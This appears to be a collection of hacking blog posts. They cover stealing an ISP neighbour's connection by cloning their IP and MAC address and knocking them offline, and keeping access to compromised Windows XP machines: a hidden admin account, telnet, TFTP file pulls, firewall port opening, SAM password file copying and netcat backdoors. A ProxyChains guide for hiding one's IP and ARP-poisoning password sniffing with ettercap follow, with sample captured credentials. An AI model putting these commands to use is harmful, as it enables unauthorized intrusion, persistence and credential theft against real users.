Level of insecurity in Sify continues to amaze me. Maybe it’s just the flawed LAN kind of network design they use, maybe it’s the equipment or software ..whatever.

Anyhow, I’ve found another way to exploit Sify networks.Well, it’s not really a new exploit  Attacks like this are not new. Managing a successful attack can give you free internet at the expense of some poor soul who happens to be in same network as yours.

 I’ll not post complete details, only a bit of outline. Considering the no. of retarded script kiddies who are likely to use this simple exploit and misuse bandwidth of other Sify users, I think it’s a fair idea.

1st you need to run a port scan and note down all the IPs and corresponding MAC addresses in your Sify network. Any moderately good port scanner can do it for you.

2nd choose one IP-MAC address combination of any user who is most likely logged in at that time and change your own IP and MAC address to same 

3rd, now use something to kick off that user temporarily off the network. Try doing this thing quick. It’s one of the most vital steps. Hints, DoS, ARP spoof :p

Open your browser and start surfing, downloading whatever. This attack works on almost every LAN, but I expected better from a national level ISP

Part 1

In this post, I’ll post more stuff that you can do to maintain access to any remote Windows XP computer. Previous post is here.


1. Creating Invisible Account

You can create a user “Admin” by running following command

c:windowssystem32net user admin admin /add

But this user will be visible on XP logon screen. To hide it, you’ll have to edit some registry settings
Open up Registry Editor and navigate to this key

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList

Here, modify or create a DWORD Value by right-clicking the right side of the screen and adding DWORD Value. Name of the value must be same as the account name (admin here) that you want to hide. Set the value data 0 to hide it and 0 to unhide.

2. Enabling Telnet

Telnet is one simple utility that you can use to maintain access without uploading any extra backdoor/software. Telnet server is disabled on most PCs by default. You’ll have to manually enable the service to start automatically

sc config telnet start= auto net start telnet

That’s it. Any service can be enabled using this command. Just replace telnet with the service of your choice.
Now you can use the account you created earlier to login any time you want.

In this post I’ll write about what to do once you gain administrative privileges on a Windows PC. There’s lot that you can do, depending upon your inclinations (I hope benign).
Don’t ask me how to get admin rights in first place. Figure that out yourself.
Maybe I’ll write something on that someday, but not now.

Anyhow, once you get in open a windows command shell.
Here are a few things you might like to do:

1) Uploading/downloading files

First thing you might do is uploading a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start tftp service/daemon on your PC first and place the files you want to upload in the programs working directory. In most linux versions, its /tmp

Type the following command to upload netsh.exe file.

C:WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe

Here

-i specifies binary transfer mode

GET tells the victim PC to fetch the file from remote PC. You can use PUT to copy data onto a remote PC

192.168.1.10 is your ip

First netsh.exe is the file you want to upload

Second netsh.exe is the filename you want to keep in victim PC. You can change it to anything you want.

2. Editing network settings

The file netsh.exe is a Windows program for editing network related settings of a PC. Most XP PCs don’t have it by default. You’ll have to upload it. In this case, it’s used to open certain ports in Windows Firewall, that otherwise could be blocked. VNC uses ports 5900 and 5800 for communications. You can edit the firewall setings to unblock these ports by using these commands:

netsh firewall set portopening tcp 5800

netsh firewall set portopening tcp 5900

netsh.exe firewall set portopening udp 5900

This is just an example. You can use this command to block or unblock any port. Keep in mind, unblocking a particular port doesn’t mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet will be of no use, unless telnet service is started on that PC.

3). Copying SAM

SAM file contains list of all the users and corresponding passwords in Windows. Though it’s encryption can be hard to break depending upon password strength, it’s a very juicy target. There are quite a few paid and free software to do that. It’s default location is

C:windowssystem32config

It’s not possible to copy the SAM file directly as it’s a protected system file. But there is a loophole here too. A backup copy of SAM is almost always located in

C:windowsrepair

You can copy this file to your own PC unlike original SAM.

4). Uploading a back-door

A back-door program for example netcat is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily. So it’s slightly out of fashion. If that’s the case, you can try using some script based back-doors like Matahari. It’s a perl script. Only downside is that the target PC should have perl installed which most windows PCs don’t have.
Linux fares better in this case. Another good option is VNC.

That’s enough for now. Let me know if you have any suggestions or corrections.


There are probably dozens of programs on any OS that don’t have any option for using proxies. Many common command line tools like ping, traceroute don’t work if the network you are on, forces you to use a proxy. Finally found a way to specify a proxy for these programs . ProxyChains  is one very good tool that enables you to use a proxy for not only specifying a path to outside networks but also use anonymous proxies for your privacy. 

 It’s quite simple to install and use. First download and install the script. 

Then navigate to /etc folder and open proxychains.conf file in any text editor of your choice. It should look like this.

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic – Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict – Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random – Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests – no leak for DNS data
proxy_dns 

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
# type host port [user pass]
# (values separated by ‘tab’ or ‘blank’)
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080 
#  
#
# proxy types: http, socks4, socks5
# ( auth types supported: “basic”-http “user/pass”-socks )
#
[ProxyList]
# add proxy here …
# meanwile
# defaults set to “tor”
http 10.123.137.1 8080
socks4 111.44.45.31 80

Now depending upon your network configuration, you’ll need to add proxies to this file. If you’re on a network that routes all data through a proxy server, then replace the bold green text with the type of proxy (http, socks4,5 ), ip address and port number. Separate each field by a TAB. That’ll be enough for you to force your programs to use your network’s proxy.

But if  you want to use another proxy for any purpose including hiding your ip, you can add other proxies along with their type and port number same way as previous one. (Red bold text). Additionaly you may have to add username and password if the proxy server requires so.

Notice the options #dynamic_chain, #strict_chain and #random_chain . 
Removing the # sign from any one of these 3 specifies the order in which the proxies are to be used. In this example I’m using strict_chain option, though dynamic_chain will also work.

Save the file and exit from text editor. Now it’s time to see it in action. Open up your command line and type proxychains before the program name to force it to use your proxylist. 

user~# proxychains program

As simple as that :)

This is probably the easiest way to “hack” various passwords including email. All you need is ettercap.
It’s a easy to use GUI based sniffer. (Good news for people scared of command line).
Download and install the software on your PC from this link. Only source packages are available. Instructions for running on a Windows platform are here. I’ve not tried that yet.
For this hack to work, your PC needs to be on the network. You can’t do it from outside.

First click on Sniff –> Unified Sniffing

Then click on Hosts and input the list of hosts you want to snoop on. You can either feed a list of ips or let ettercap select online hosts in your subnet. I tried sniffing on hosts outside my subnet,(there is a reason why I had this idea of sniffing ) but that hasn’t worked well yet.

Click on Mitm (for newbies, MITM stands for Man In the Middle) and click on ARP poisoning. On next box, select Sniff remote connections

Click on Start –> Start Sniffing.

Now keep an eye on the output screen as the users login to websites. Their login details are displayed in plain text. :D

In case you don’t see anything, you may need to do a bit of work. Find the file ettercap.conf and remove the # sign from last two lines below.

# if you use iptables:
#redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $
#redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$

ettercap.conf file is placed in /usr/local/etc.

Here is a sample of what I captured on one of my networks. Details have been changed to protect the innocents. :P

Listening on eth0… (Ethernet)

eth0 -> 00:A2:81:99:BA:01 10.17.167.60 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
26 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

HTTP : 10.17.167.24:8080 -> USER: a23bb2-dc2d-4435-be54-cbf8a64431cb PASS: HTRnheQp INFO: http://online.speedbit.com/online/update.aspx?CV=1.1.0.6&
DHCP: [00:0D:60:9F:10:0E] REQUEST 10.17.167.188
DHCP: [10.17.167.1] ACK : 10.17.167.188 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “smtup.com”
POP : 10.17.166.21:110 -> USER: user.one PASS: mypass1234
HTTP : 116.143.123.122:80 -> USER: 4f3ab8b2-dc2d-c245-a654-0ca8a64431cb PASS: nRHh6Pq INFO: online.speedbit.com/
DHCP: [10.17.167.1] ACK : 10.17.167.169 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “mydomain.com”
HTTP : 202.137.234.20:80 -> USER: mantris PASS: yourpass INFO: http://www.rediff.com
DHCP: [00:23:E6:1B:FD:7F] REQUEST 10.17.16.69
DHCP: [10.17.16.1] ACK : 10.17.167.69 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.3 “mydomain.com”
HTTP : 10.17.16.24:8080 -> USER: kaykay PASS: batman INFO: http://www.rediff.com/index.html

Do not misuse this information. I use this tool only to monitor traffic for illegal activities on my network.

Greets: remote-exploit.org